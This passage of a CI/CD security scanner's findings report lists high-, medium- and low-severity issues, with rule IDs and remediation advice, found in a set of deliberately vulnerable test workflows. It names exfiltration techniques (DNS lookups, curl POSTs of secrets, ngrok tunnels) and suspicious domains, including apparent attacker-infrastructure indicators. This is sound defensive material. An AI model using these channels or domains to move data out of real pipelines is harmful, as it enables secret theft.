vulnerable-workflows/04-network-exfiltration.yml | Review DNS-related commands. Restrict DNS resolution in CI if possible. |
| โ ๏ธ HIGH | SCA-039 |
Tunnel service detected: ngrok tunnel detected
network_exfiltration |
vulnerable-workflows/04-network-exfiltration.yml | Remove tunnel services from CI workflows. Use proper deployment pipelines instead. |
| โ ๏ธ HIGH | SCA-039 |
Tunnel service detected: ngrok tunnel detected
network_exfiltration |
vulnerable-workflows/04-network-exfiltration.yml | Remove tunnel services from CI workflows. Use proper deployment pipelines instead. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: scan.aquasecurtiy.org
network_exfiltration |
vulnerable-workflows/19-teampcp-indicators.yml | Remove access to scan.aquasecurtiy.org. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: aquasecurtiy.org
network_exfiltration |
vulnerable-workflows/19-teampcp-indicators.yml | Remove access to aquasecurtiy.org. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io
network_exfiltration |
vulnerable-workflows/19-teampcp-indicators.yml | Remove access to tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: icp0.io
network_exfiltration |
vulnerable-workflows/19-teampcp-indicators.yml | Remove access to icp0.io. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: webhook.site
network_exfiltration |
vulnerable-workflows/15-behavioral-obfuscation.yml | Remove access to webhook.site. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: requestbin.net
network_exfiltration |
vulnerable-workflows/15-behavioral-obfuscation.yml | Remove access to requestbin.net. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-022 |
Data exfiltration pattern: base64 data sent via curl
network_exfiltration |
vulnerable-workflows/15-behavioral-obfuscation.yml | Review this command. If legitimate, document why. Otherwise remove immediately. |
| โ ๏ธ HIGH | SCA-022 |
Data exfiltration pattern: base64 data sent via curl
network_exfiltration |
vulnerable-workflows/16-gitlab-ci.yml | Review this command. If legitimate, document why. Otherwise remove immediately. |
| โ ๏ธ HIGH | SCA-022 |
Data exfiltration pattern: curl POSTing secret data
network_exfiltration |
vulnerable-workflows/16-gitlab-ci.yml | Review this command. If legitimate, document why. Otherwise remove immediately. |
| โ ๏ธ HIGH | SCA-038 |
DNS exfiltration: DNS lookup with variable (potential exfil)
network_exfiltration |
vulnerable-workflows/34-network-egress-anomaly.yml | Review DNS-related commands. Restrict DNS resolution in CI if possible. |
| โ ๏ธ HIGH | SCA-038 |
DNS exfiltration: nslookup with variable (potential exfil)
network_exfiltration |
vulnerable-workflows/34-network-egress-anomaly.yml | Review DNS-related commands. Restrict DNS resolution in CI if possible. |
| โ ๏ธ HIGH | SCA-038 |
DNS exfiltration: host command with variable (potential exfil)
network_exfiltration |
vulnerable-workflows/34-network-egress-anomaly.yml | Review DNS-related commands. Restrict DNS resolution in CI if possible. |
| โ ๏ธ HIGH | SCA-038 |
DNS exfiltration: DNS-over-HTTPS exfiltration
network_exfiltration |
vulnerable-workflows/34-network-egress-anomaly.yml | Review DNS-related commands. Restrict DNS resolution in CI if possible. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: webhook.site
network_exfiltration |
vulnerable-workflows/34-network-egress-anomaly.yml | Remove access to webhook.site. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: requestbin.com
network_exfiltration |
vulnerable-workflows/34-network-egress-anomaly.yml | Remove access to requestbin.com. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: ngrok.io
network_exfiltration |
vulnerable-workflows/34-network-egress-anomaly.yml | Remove access to ngrok.io. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: ngrok-free.app
network_exfiltration |
vulnerable-workflows/34-network-egress-anomaly.yml | Remove access to ngrok-free.app. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: pipedream.net
network_exfiltration |
vulnerable-workflows/34-network-egress-anomaly.yml | Remove access to pipedream.net. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Tunnel service detected: ngrok tunnel detected
network_exfiltration |
vulnerable-workflows/34-network-egress-anomaly.yml | Remove tunnel services from CI workflows. Use proper deployment pipelines instead. |
| โ ๏ธ HIGH | SCA-039 |
Tunnel service detected: ngrok tunnel detected
network_exfiltration |
vulnerable-workflows/34-network-egress-anomaly.yml | Remove tunnel services from CI workflows. Use proper deployment pipelines instead. |
| โ ๏ธ HIGH | SCA-109 |
Egress anomaly: curl to raw IP address
network_exfiltration |
vulnerable-workflows/34-network-egress-anomaly.yml | Use StepSecurity Harden-Runner for network egress monitoring. Block outbound traffic to non-allowed endpoints. If this is a legitimate domain, add it to .scg-config.yml egress_allowlist. |
| โ ๏ธ HIGH | SCA-109 |
Egress anomaly: wget to raw IP address
network_exfiltration |
vulnerable-workflows/34-network-egress-anomaly.yml | Use StepSecurity Harden-Runner for network egress monitoring. Block outbound traffic to non-allowed endpoints. If this is a legitimate domain, add it to .scg-config.yml egress_allowlist. |
| โ ๏ธ HIGH | SCA-109 |
Egress anomaly: curl to raw IP address
network_exfiltration |
vulnerable-workflows/34-network-egress-anomaly.yml | Use StepSecurity Harden-Runner for network egress monitoring. Block outbound traffic to non-allowed endpoints. If this is a legitimate domain, add it to .scg-config.yml egress_allowlist. |
| โ ๏ธ HIGH | SCA-039 |
Tunnel service detected: ngrok tunnel detected
network_exfiltration |
vulnerable-workflows/18-scg-config.yml | Remove tunnel services from CI workflows. Use proper deployment pipelines instead. |
| โ ๏ธ HIGH | SCA-039 |
Tunnel service detected: ngrok tunnel detected
network_exfiltration |
vulnerable-workflows/18-scg-config.yml | Remove tunnel services from CI workflows. Use proper deployment pipelines instead. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: polyfill.io
network_exfiltration |
vulnerable-workflows/22-polyfill-cdn-attack.yml | Remove access to polyfill.io. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: polyfill.io
network_exfiltration |
vulnerable-workflows/22-polyfill-cdn-attack.yml | Remove access to polyfill.io. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: polyfill.io
network_exfiltration |
vulnerable-workflows/22-polyfill-cdn-attack.yml | Remove access to polyfill.io. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: cdn.polyfill.io
network_exfiltration |
vulnerable-workflows/22-polyfill-cdn-attack.yml | Remove access to cdn.polyfill.io. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-039 |
Suspicious domain access: polyfill.io
network_exfiltration |
vulnerable-workflows/22-polyfill-cdn-attack.yml | Remove access to polyfill.io. Review if this was intentionally added or injected. |
| โ ๏ธ HIGH | SCA-062 |
OIDC token accessed in run block
oidc_audit |
vulnerable-workflows/10-oidc-abuse.yml | Use official cloud auth actions (aws-actions/configure-aws-credentials, google-github-actions/auth) instead of manual OIDC token handling. |
| โ ๏ธ HIGH | SCA-062 |
OIDC token accessed in run block
oidc_audit |
vulnerable-workflows/27-oidc-token-abuse.yml | Use official cloud auth actions (aws-actions/configure-aws-credentials, google-github-actions/auth) instead of manual OIDC token handling. |
| โ ๏ธ HIGH | SCA-062 |
OIDC token accessed in run block
oidc_audit |
vulnerable-workflows/27-oidc-token-abuse.yml | Use official cloud auth actions (aws-actions/configure-aws-credentials, google-github-actions/auth) instead of manual OIDC token handling. |
| โ ๏ธ HIGH | SCA-069 |
Untrusted artifact consumption in workflow_run context
artifact_integrity |
vulnerable-workflows/28-artifact-attacks.yml | Validate artifact contents before use. Never execute downloaded artifacts directly. Verify the triggering workflow conclusion and head_sha before consuming artifacts. |
| โ ๏ธ HIGH | SCA-074 |
Unpinned container image in 'build-container': docker:latest
container_security |
vulnerable-workflows/26-container-attacks.yml | Pin container images to SHA256 digests: image@sha256:<digest> |
| โ ๏ธ HIGH | SCA-079 |
Insecure Docker registry configuration
container_security |
vulnerable-workflows/26-container-attacks.yml | Always use TLS for registry communication. Remove --insecure-registry flags. |
| โ ๏ธ HIGH | SCA-080 |
Unpinned Dockerfile base image: node:latest
container_security |
vulnerable-workflows/26-Dockerfile | Pin to digest: node:latest@sha256:<digest> |
| โ ๏ธ HIGH | SCA-081 |
Remote URL in Dockerfile ADD instruction
container_security |
vulnerable-workflows/26-Dockerfile | Use COPY with pre-downloaded and verified files. Verify checksums after download. |
| โ ๏ธ HIGH | SCA-081 |
Remote URL in Dockerfile ADD instruction
container_security |
vulnerable-workflows/26-Dockerfile | Use COPY with pre-downloaded and verified files. Verify checksums after download. |
| โ ๏ธ HIGH | SCA-BHV-FLOW |
Deferred / background execution
behavioral_analysis |
vulnerable-workflows/14-runtime-cryptominer.yml | Add timeout-minutes to all jobs. Avoid deferred execution and error suppression in CI. All commands should run synchronously with visible output. |
| โ ๏ธ HIGH | SCA-BHV-PERS |
SSH key manipulation
behavioral_analysis |
vulnerable-workflows/14-runtime-cryptominer.yml | Use ephemeral (GitHub-hosted) runners. If self-hosted runners are required, use ephemeral mode and rebuild after every job. Never persist state between workflow runs. |
| โ ๏ธ HIGH | SCA-BHV-CRED |
Accessing GitHub Actions runtime token internals
behavioral_analysis |
vulnerable-workflows/10-oidc-abuse.yml | Do not dump or enumerate environment variables. Use OIDC authentication instead of long-lived secrets. Restrict secret access to the minimum set of steps that need them. |
| โ ๏ธ HIGH | SCA-BHV-FLOW |
Unsanitised write to GITHUB_ENV
behavioral_analysis |
vulnerable-workflows/10-oidc-abuse.yml | Use heredoc delimiter syntax for multi-line values. Sanitise all values before writing to GITHUB_ENV. |
| โ ๏ธ HIGH | SCA-BHV-DYN |
Network fetch + code execution in job 'build-checks'
behavioral_analysis |
vulnerable-workflows/37-build-system-compromise.yml | Pin downloads to checksums. Avoid piping network output directly to execution. |
| โ ๏ธ HIGH | SCA-BHV-PERM |
write-all permissions at workflow level
behavioral_analysis |
vulnerable-workflows/35-dispatch-codeowners.yml | Apply least-privilege: grant only the specific permissions each job needs (e.g., contents: read, issues: write). |
| โ ๏ธ HIGH | SCA-BHV-DYN |
Privileged Docker container execution
behavioral_analysis |
vulnerable-workflows/09-container-escape.yml | Never pipe downloaded content to a shell. Pin all downloads to checksums (sha256). Use official package managers instead of ad-hoc downloads. |
| โ ๏ธ HIGH | SCA-BHV-PERM |
write-all permissions at workflow level
behavioral_analysis |
vulnerable-workflows/19-teampcp-indicators.yml | Apply least-privilege: grant only the specific permissions each job needs (e.g., contents: read, issues: write). |
| โ ๏ธ HIGH | SCA-BHV-PERM |
write-all permissions at workflow level
behavioral_analysis |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Apply least-privilege: grant only the specific permissions each job needs (e.g., contents: read, issues: write). |
| โ ๏ธ HIGH | SCA-BHV-CRED |
Accessing GitHub Actions runtime token internals
behavioral_analysis |
vulnerable-workflows/27-oidc-token-abuse.yml | Do not dump or enumerate environment variables. Use OIDC authentication instead of long-lived secrets. Restrict secret access to the minimum set of steps that need them. |
| โ ๏ธ HIGH | SCA-BHV-CRED |
Accessing GitHub Actions runtime token internals
behavioral_analysis |
vulnerable-workflows/27-oidc-token-abuse.yml | Do not dump or enumerate environment variables. Use OIDC authentication instead of long-lived secrets. Restrict secret access to the minimum set of steps that need them. |
| โ ๏ธ HIGH | SCA-BHV-PERM |
write-all permissions at workflow level
behavioral_analysis |
vulnerable-workflows/23-self-hosted-runner.yml | Apply least-privilege: grant only the specific permissions each job needs (e.g., contents: read, issues: write). |
| โ ๏ธ HIGH | SCA-BHV-DYN |
pip install from URL
behavioral_analysis |
vulnerable-workflows/29-dependency-confusion.yml | Never pipe downloaded content to a shell. Pin all downloads to checksums (sha256). Use official package managers instead of ad-hoc downloads. |
| โ ๏ธ HIGH | SCA-BHV-DYN |
pip install from URL
behavioral_analysis |
vulnerable-workflows/29-dependency-confusion.yml | Never pipe downloaded content to a shell. Pin all downloads to checksums (sha256). Use official package managers instead of ad-hoc downloads. |
| โ ๏ธ HIGH | SCA-BHV-DYN |
pip install from URL
behavioral_analysis |
vulnerable-workflows/29-dependency-confusion.yml | Never pipe downloaded content to a shell. Pin all downloads to checksums (sha256). Use official package managers instead of ad-hoc downloads. |
| โ ๏ธ HIGH | SCA-BHV-DYN |
Network fetch + code execution in job 'deploy'
behavioral_analysis |
vulnerable-workflows/11-artifact-poisoning.yml | Pin downloads to checksums. Avoid piping network output directly to execution. |
| โ ๏ธ HIGH | SCA-BHV-DYN |
Network fetch + code execution in job 'test'
behavioral_analysis |
vulnerable-workflows/15-behavioral-obfuscation.yml | Pin downloads to checksums. Avoid piping network output directly to execution. |
| โ ๏ธ HIGH | SCA-BHV-DYN |
Network fetch + code execution in job 'test'
behavioral_analysis |
vulnerable-workflows/15-behavioral-obfuscation.yml | Pin downloads to checksums. Avoid piping network output directly to execution. |
| โ ๏ธ HIGH | SCA-BHV-DYN |
Network fetch + code execution in job 'setup'
behavioral_analysis |
vulnerable-workflows/13-binary-dropper.yml | Pin downloads to checksums. Avoid piping network output directly to execution. |
| โ ๏ธ HIGH | SCA-BHV-DYN |
Network fetch + code execution in job 'setup'
behavioral_analysis |
vulnerable-workflows/13-binary-dropper.yml | Pin downloads to checksums. Avoid piping network output directly to execution. |
| โ ๏ธ HIGH | SCA-BHV-PERM |
write-all permissions at workflow level
behavioral_analysis |
vulnerable-workflows/24-output-injection.yml | Apply least-privilege: grant only the specific permissions each job needs (e.g., contents: read, issues: write). |
| โ ๏ธ HIGH | SCA-BHV-DYN |
Privileged Docker container execution
behavioral_analysis |
vulnerable-workflows/16-gitlab-ci.yml | Never pipe downloaded content to a shell. Pin all downloads to checksums (sha256). Use official package managers instead of ad-hoc downloads. |
| โ ๏ธ HIGH | SCA-BHV-PERM |
write-all permissions at workflow level
behavioral_analysis |
vulnerable-workflows/28-artifact-attacks.yml | Apply least-privilege: grant only the specific permissions each job needs (e.g., contents: read, issues: write). |
| โ ๏ธ HIGH | SCA-BHV-PERM |
write-all permissions at workflow level
behavioral_analysis |
vulnerable-workflows/06-permission-escalation.yml | Apply least-privilege: grant only the specific permissions each job needs (e.g., contents: read, issues: write). |
| โ ๏ธ HIGH | SCA-106 |
[GITLAB] Secret variable in echo
cross_platform_ci |
vulnerable-workflows/16-gitlab-ci.yml | Review and remediate this gitlab configuration issue. |
| โ ๏ธ HIGH | SCA-106 |
[GITLAB] Secret variable in echo
cross_platform_ci |
vulnerable-workflows/16-gitlab-ci.yml | Review and remediate this gitlab configuration issue. |
| โ ๏ธ HIGH | SCA-106 |
[GITLAB] Secret variable in echo
cross_platform_ci |
vulnerable-workflows/16-gitlab-ci.yml | Review and remediate this gitlab configuration issue. |
| โ ๏ธ HIGH | SCA-107 |
[CIRCLECI] Secret variable in echo
cross_platform_ci |
vulnerable-workflows/31-circleci-config.yml | Review and remediate this circleci configuration issue. |
| โ ๏ธ HIGH | SCA-107 |
[CIRCLECI] Secret variable in echo
cross_platform_ci |
vulnerable-workflows/31-circleci-config.yml | Review and remediate this circleci configuration issue. |
| โ ๏ธ HIGH | SCA-107 |
[CIRCLECI] Secret variable in echo
cross_platform_ci |
vulnerable-workflows/31-circleci-config.yml | Review and remediate this circleci configuration issue. |
| Severity | Rule ID | Finding | Location | Remediation |
|---|---|---|---|---|
| ๐ถ MEDIUM | SCA-055 |
Dangerous command: Base64 decoding (potential obfuscation)
workflow_analysis |
vulnerable-workflows/10-oidc-abuse.yml | Download files, verify checksums, then execute. Never pipe remote content directly to a shell interpreter. |
| ๐ถ MEDIUM | SCA-024 |
Mutable container image: docker:latest
workflow_analysis |
vulnerable-workflows/26-container-attacks.yml | Pin container images to SHA digests: image@sha256:... |
| ๐ถ MEDIUM | SCA-055 |
Dangerous command: Base64 decoding (potential obfuscation)
workflow_analysis |
vulnerable-workflows/15-behavioral-obfuscation.yml | Download files, verify checksums, then execute. Never pipe remote content directly to a shell interpreter. |
| ๐ถ MEDIUM | SCA-040 |
Cache poisoning risk in job 'build'
cache_poisoning |
vulnerable-workflows/05-cache-poisoning.yml | 1. Include lockfile hashes in cache keys: hashFiles('**/package-lock.json') 2. Don't use restore-keys with broad prefixes 3. Never use actions/cache with pull_request_target 4. Verify cache integrity |
| ๐ถ MEDIUM | SCA-040 |
Cache poisoning risk in job 'build'
cache_poisoning |
vulnerable-workflows/05-cache-poisoning.yml | 1. Include lockfile hashes in cache keys: hashFiles('**/package-lock.json') 2. Don't use restore-keys with broad prefixes 3. Never use actions/cache with pull_request_target 4. Verify cache integrity |
| ๐ถ MEDIUM | SCA-085 |
Reusable workflow from external organization: org-name
reusable_workflow |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Audit the external workflow at org-name/shared-workflows. If possible, fork and maintain your own copy. Pin to a SHA. |
| ๐ถ MEDIUM | SCA-085 |
Reusable workflow from external organization: external-security-org
reusable_workflow |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Audit the external workflow at external-security-org/scanners. If possible, fork and maintain your own copy. Pin to a SHA. |
| ๐ถ MEDIUM | SCA-085 |
Reusable workflow from external organization: org-name
reusable_workflow |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Audit the external workflow at org-name/shared-workflows. If possible, fork and maintain your own copy. Pin to a SHA. |
| ๐ถ MEDIUM | SCA-087 |
Excessive secrets passed to reusable workflow in 'build-and-publish'
reusable_workflow |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Minimize secrets passed to external workflows. Use OIDC for cloud auth instead of long-lived secrets. |
| ๐ถ MEDIUM | SCA-085 |
Reusable workflow from external organization: org-name
reusable_workflow |
vulnerable-workflows/25-reusable-workflow-attacks.yml | Audit the external workflow at org-name/shared-workflows. If possible, fork and maintain your own copy. Pin to a SHA. |
| ๐ถ MEDIUM | SCA-085 |
Reusable workflow from external organization: random-external-org
reusable_workflow |
vulnerable-workflows/12-reusable-workflow-trust.yml | Audit the external workflow at random-external-org/shared-workflows. If possible, fork and maintain your own copy. Pin to a SHA. |
| ๐ถ MEDIUM | SCA-085 |
Reusable workflow from external organization: another-org
reusable_workflow |
vulnerable-workflows/12-reusable-workflow-trust.yml | Audit the external workflow at another-org/deploy-workflows. If possible, fork and maintain your own copy. Pin to a SHA. |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/20-cloud-metadata-imds.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/14-runtime-cryptominer.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/26-container-attacks.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/17-egress-exfiltration.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/37-build-system-compromise.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/04-network-exfiltration.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/09-container-escape.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/33-ml-model-risks.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/36-additional-malicious-packages.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/05-cache-poisoning.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/21-ai-credential-exposure.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/29-dependency-confusion.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/03-secret-exposure.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/15-behavioral-obfuscation.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/13-binary-dropper.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/16-gitlab-ci.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/34-network-egress-anomaly.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/31-circleci-config.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/30-azure-pipelines.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/18-scg-config.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/22-polyfill-cdn-attack.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-034 |
Missing permissions block - defaults to read-write all
permission_audit |
vulnerable-workflows/12-reusable-workflow-trust.yml | Add a top-level 'permissions' block with only the minimum required scopes: permissions: contents: read # add other scopes as needed |
| ๐ถ MEDIUM | SCA-022 |
Data exfiltration pattern: data downloaded and decoded
network_exfiltration |
vulnerable-workflows/17-egress-exfiltration.yml | Review this command. If legitimate, document why. Otherwise remove immediately. |
| ๐ถ MEDIUM | SCA-022 |
Data exfiltration pattern: data downloaded and decoded
network_exfiltration |
vulnerable-workflows/34-network-egress-anomaly.yml | Review this command. If legitimate, document why. Otherwise remove immediately. |
| ๐ถ MEDIUM | SCA-067 |
Artifact upload without provenance attestation in 'deep-analysis'
artifact_integrity |
.github/workflows/showcase-pipeline.yml | Add actions/attest-build-provenance@v2 after the upload step to generate SLSA provenance for published artifacts. |
| ๐ถ MEDIUM | SCA-067 |
Artifact upload without provenance attestation in 'paranoid-audit'
artifact_integrity |
.github/workflows/showcase-pipeline.yml | Add actions/attest-build-provenance@v2 after the upload step to generate SLSA provenance for published artifacts. |
| ๐ถ MEDIUM | SCA-068 |
Artifact download without integrity verification in 'security-integration'
artifact_integrity |
.github/workflows/showcase-pipeline.yml | Verify downloaded artifact integrity with sha256sum, cosign verify, or slsa-verifier before use. |
| ๐ถ MEDIUM | SCA-068 |
Artifact download without integrity verification in 'report-deployment'
artifact_integrity |
.github/workflows/showcase-pipeline.yml | Verify downloaded artifact integrity with sha256sum, cosign verify, or slsa-verifier before use. |
| ๐ถ MEDIUM | SCA-068 |
Artifact download without integrity verification in 'report-deployment'
artifact_integrity |
.github/workflows/showcase-pipeline.yml | Verify downloaded artifact integrity with sha256sum, cosign verify, or slsa-verifier before use. |
| ๐ถ MEDIUM | SCA-072 |
Build and publish in same job 'build-container' (TOCTOU risk)
artifact_integrity |
vulnerable-workflows/26-container-attacks.yml | Separate build and publish into different jobs. Upload artifacts from the build job, verify checksums, then download in the publish job. |
| ๐ถ MEDIUM | SCA-067 |
Artifact upload without provenance attestation in 'build'
artifact_integrity |
vulnerable-workflows/11-artifact-poisoning.yml | Add actions/attest-build-provenance@v2 after the upload step to generate SLSA provenance for published artifacts. |
| ๐ถ MEDIUM | SCA-068 |
Artifact download without integrity verification in 'deploy'
artifact_integrity |
vulnerable-workflows/11-artifact-poisoning.yml | Verify downloaded artifact integrity with sha256sum, cosign verify, or slsa-verifier before use. |
| ๐ถ MEDIUM | SCA-067 |
Artifact upload without provenance attestation in 'build-and-publish'
artifact_integrity |
vulnerable-workflows/28-artifact-attacks.yml | Add actions/attest-build-provenance@v2 after the upload step to generate SLSA provenance for published artifacts. |
| ๐ถ MEDIUM | SCA-071 |
Artifact overwrite enabled in 'build-and-publish'
artifact_integrity |
vulnerable-workflows/28-artifact-attacks.yml | Avoid overwrite: true. Use unique artifact names per run. Verify artifact checksums after download. |
| ๐ถ MEDIUM | SCA-072 |
Build and publish in same job 'build-and-publish' (TOCTOU risk)
artifact_integrity |
vulnerable-workflows/28-artifact-attacks.yml | Separate build and publish into different jobs. Upload artifacts from the build job, verify checksums, then download in the publish job. |
| ๐ถ MEDIUM | SCA-078 |
Docker image pushed without signing
container_security |
vulnerable-workflows/26-container-attacks.yml | Sign images after push with cosign: cosign sign --key <key> <image>@<digest> |
| ๐ถ MEDIUM | SCA-BHV-OBF |
Data decoding / deobfuscation utility
behavioral_analysis |
.github/workflows/showcase-pipeline.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| ๐ถ MEDIUM | SCA-BHV-ART |
Appending/writing to build output directory
behavioral_analysis |
.github/workflows/showcase-pipeline.yml | Verify build artifact integrity with checksums. Separate build and publish steps into different jobs. Use SLSA provenance attestations for all published artifacts. |
| ๐ถ MEDIUM | SCA-BHV-CRED |
Secrets passed to third-party action: peaceiris/actions-gh-pages@4f9cc6602d3f66b9c108549d475ec49e8ef4d45e
behavioral_analysis |
.github/workflows/showcase-pipeline.yml | Audit the third-party action's source code. Pin to a full SHA. Minimise secrets passed to third-party actions. |
| ๐ถ MEDIUM | SCA-BHV-OBF |
Data decoding / deobfuscation utility
behavioral_analysis |
vulnerable-workflows/27-oidc-token-abuse.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| ๐ถ MEDIUM | SCA-BHV-OBF |
Data decoding / deobfuscation utility
behavioral_analysis |
vulnerable-workflows/27-oidc-token-abuse.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| ๐ถ MEDIUM | SCA-BHV-OBF |
Data decoding / deobfuscation utility
behavioral_analysis |
vulnerable-workflows/27-oidc-token-abuse.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| ๐ถ MEDIUM | SCA-BHV-TRUST |
Self-hosted runner usage
behavioral_analysis |
vulnerable-workflows/23-self-hosted-runner.yml | Apply least-privilege to containers. Never use --privileged or mount the host root filesystem. Use GitHub-hosted runners for untrusted workloads. |
| ๐ถ MEDIUM | SCA-BHV-OBF |
Data decoding / deobfuscation utility
behavioral_analysis |
vulnerable-workflows/01-compromised-action.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| ๐ถ MEDIUM | SCA-BHV-OBF |
Data decoding / deobfuscation utility
behavioral_analysis |
vulnerable-workflows/18-scg-config.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| ๐ถ MEDIUM | SCA-BHV-OBF |
Data decoding / deobfuscation utility
behavioral_analysis |
vulnerable-workflows/02-pwn-request.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| ๐ถ MEDIUM | SCA-BHV-OBF |
Data decoding / deobfuscation utility
behavioral_analysis |
vulnerable-workflows/02-pwn-request.yml | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| ๐ถ MEDIUM | SCA-BHV-OBF |
Data decoding / deobfuscation utility
behavioral_analysis |
scripts/generate-site.py | Remove obfuscated code. All CI logic should be human-readable. If you must decode data, verify integrity with checksums first. |
| Severity | Rule ID | Finding | Location | Remediation |
|---|---|---|---|---|
| โน๏ธ LOW | SCA-PROV-SLSA |
Package published without attestation
provenance_verification |
vulnerable-workflows/36-additional-malicious-packages.yml | Add SLSA provenance generation. For npm, use --provenance flag. For PyPI, use Trusted Publishing. Consider actions/attest-build-provenance. |
| โน๏ธ LOW | SCA-PROV-SLSA |
Package published without attestation
